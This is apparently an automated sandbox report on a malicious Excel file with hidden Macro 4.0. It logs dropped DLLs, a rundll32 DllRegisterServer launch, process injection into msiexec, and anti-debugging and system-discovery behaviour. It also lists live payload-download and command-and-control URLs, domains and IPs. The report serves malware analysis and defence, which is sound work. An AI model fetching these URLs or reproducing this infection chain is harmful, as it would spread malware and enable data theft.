    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009869A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ida\suicy.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2796Thread sleep time: -240000s >= -30000s
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009869A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00982EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A50D28 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A50865 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A50C5E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_000A2EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Contains functionality to inject code into remote processesShow sources
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: SecuriteInfo.com.Heur.30497.xls, type: SAMPLE
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: msiexec.exe, 00000004.00000002.2355445451.0000000000AD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: msiexec.exe, 00000004.00000002.2355445451.0000000000AD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: msiexec.exe, 00000004.00000002.2355445451.0000000000AD0000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3968A cpuid
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A395A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00971A00 CreateDialogParamW,GetVersion,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting4Path InterceptionAccess Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting4Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery35Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    4.2.msiexec.exe.90000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
    3.2.rundll32.exe.970000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File

    Domains

    SourceDetectionScannerLabelLink
    rnollg.com2%VirustotalBrowse
    gadgetswolf.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0%Avira URL Cloudsafe
    https://govemedico.tk/t0%Avira URL Cloudsafe
    http://crl3.digicert0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://homesoapmolds.com/post.phpx0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    https://gadgetswolf.com/0%Avira URL Cloudsafe
    https://rnollg.com/kev/scfrd.dll0%Avira URL Cloudsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    https://gadgetswolf.com/post.php0%Avira URL Cloudsafe
    https://govemedico.tk/0%Avira URL Cloudsafe
    https://homesoapmolds.com/post.php0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://gadgetswolf.com/post.phpF/0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~0%Avira URL Cloudsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    https://rnollg.com/kev/scfrd.dll$80%Avira URL Cloudsafe
    https://homesoapmolds.com/0%Avira URL Cloudsafe
    https://govemedico.tk/post.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    homesoapmolds.com
    172.67.198.109
    truefalse
      unknown
      rnollg.com
      172.67.150.228
      truefalseunknown
      gadgetswolf.com
      172.67.200.147
      truefalseunknown
      govemedico.tk
      172.67.158.184
      truefalse
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)D0EE0000.0.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comrundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpfalse
              high
              https://govemedico.tk/tmsiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.entrust.net/server1.crl0msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                high
                http://crl3.digicertmsiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ocsp.entrust.net03msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://homesoapmolds.com/post.phpxmsiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://gadgetswolf.com/msiexec.exe, 00000004.00000002.2355361210.0000000000732000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://rnollg.com/kev/scfrd.dllbefore.1.0.0.sheet.csv_unpacktrue
                • Avira URL Cloud: safe
                unknown
                http://www.diginotar.nl/cps/pkioverheid0msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://gadgetswolf.com/post.phpmsiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://govemedico.tk/msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://homesoapmolds.com/post.phpmsiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oerundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpfalse
                  high
                  https://gadgetswolf.com/post.phpF/msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpfalse
                    high
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.icra.org/vocabulary/.rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.msiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmpfalse
                      high
                      http://investor.msn.com/rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpfalse
                        high
                        http://www.%s.comPAmsiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~SecuriteInfo.com.Heur.30497.xlsfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net0Dmsiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rnollg.com/kev/scfrd.dll$8SecuriteInfo.com.Heur.30497.xls, D0EE0000.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://secure.comodo.com/CPS0msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                          high
                          https://homesoapmolds.com/msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                            high
                            Https://homesoapmolds.com/post.phpmsiexec.exe, 00000004.00000003.2163545510.000000000076F000.00000004.00000001.sdmpfalse
                              unknown
                              https://govemedico.tk/post.phpmsiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.158.184
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              172.67.150.228
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              172.67.200.147
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              172.67.198.109
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox Version:31.0.0 Emerald
                              Analysis ID:344767
                              Start date:27.01.2021
                              Start time:04:09:13
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 6m 15s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:SecuriteInfo.com.Heur.30497.14031 (renamed file extension from 14031 to xls)
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.expl.evad.winXLS@7/12@4/4
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 75.4% (good quality ratio 75.2%)
                              • Quality average: 89.8%
                              • Quality standard deviation: 18.6%
                              HCA Information:
                              • Successful, ratio: 84%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              04:10:12API Interceptor1200x Sleep call for process: msiexec.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              172.67.158.184case (2553).xlsGet hashmaliciousBrowse
                                case (4374).xlsGet hashmaliciousBrowse
                                  case (166).xlsGet hashmaliciousBrowse
                                    172.67.150.228case (1057).xlsGet hashmaliciousBrowse
                                      case (4335).xlsGet hashmaliciousBrowse
                                        case (1522).xlsGet hashmaliciousBrowse
                                          case (166).xlsGet hashmaliciousBrowse
                                            172.67.200.147SecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                              case (4374).xlsGet hashmaliciousBrowse
                                                case (4335).xlsGet hashmaliciousBrowse
                                                  case (1522).xlsGet hashmaliciousBrowse
                                                    172.67.198.109case (1057).xlsGet hashmaliciousBrowse
                                                      case (166).xlsGet hashmaliciousBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        govemedico.tkcase (2553).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        case (1057).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        gadgetswolf.comSecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                        • 172.67.200.147
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        case (1057).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 172.67.200.147
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 172.67.200.147
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 172.67.200.147
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        rnollg.comcase (1057).xlsGet hashmaliciousBrowse
                                                        • 172.67.150.228
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 172.67.150.228
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 172.67.150.228
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 172.67.150.228
                                                        homesoapmolds.comcase (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (1057).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        CLOUDFLARENETUSSecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                        • 172.67.200.147
                                                        SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xlsGet hashmaliciousBrowse
                                                        • 172.67.201.174
                                                        SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                        • 162.159.130.233
                                                        SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                        • 162.159.134.233
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (1057).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109
                                                        PAYMENT.xlsxGet hashmaliciousBrowse
                                                        • 104.16.19.94
                                                        PAYMENT.xlsxGet hashmaliciousBrowse
                                                        • 104.16.18.94
                                                        Informacion.docGet hashmaliciousBrowse
                                                        • 104.21.89.78
                                                        PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                        • 162.159.133.233
                                                        SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        a4iz7zkilq.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        CLOUDFLARENETUSSecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                        • 172.67.200.147
                                                        SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xlsGet hashmaliciousBrowse
                                                        • 172.67.201.174
                                                        SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                        • 162.159.130.233
                                                        SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                        • 162.159.134.233
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (1057).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109
                                                        PAYMENT.xlsxGet hashmaliciousBrowse
                                                        • 104.16.19.94
                                                        PAYMENT.xlsxGet hashmaliciousBrowse
                                                        • 104.16.18.94
                                                        Informacion.docGet hashmaliciousBrowse
                                                        • 104.21.89.78
                                                        PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                        • 162.159.133.233
                                                        SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        a4iz7zkilq.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        CLOUDFLARENETUSSecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                        • 172.67.200.147
                                                        SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xlsGet hashmaliciousBrowse
                                                        • 172.67.201.174
                                                        SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                        • 162.159.130.233
                                                        SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                        • 162.159.134.233
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.44.135
                                                        case (2553).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (1057).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 104.21.73.69
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 104.21.60.169
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 172.67.198.109
                                                        PAYMENT.xlsxGet hashmaliciousBrowse
                                                        • 104.16.19.94
                                                        PAYMENT.xlsxGet hashmaliciousBrowse
                                                        • 104.16.18.94
                                                        Informacion.docGet hashmaliciousBrowse
                                                        • 104.21.89.78
                                                        PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                        • 162.159.133.233
                                                        SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        a4iz7zkilq.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        7dcce5b76c8b17472d024758970a406bcase (2553).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (1057).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (4335).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
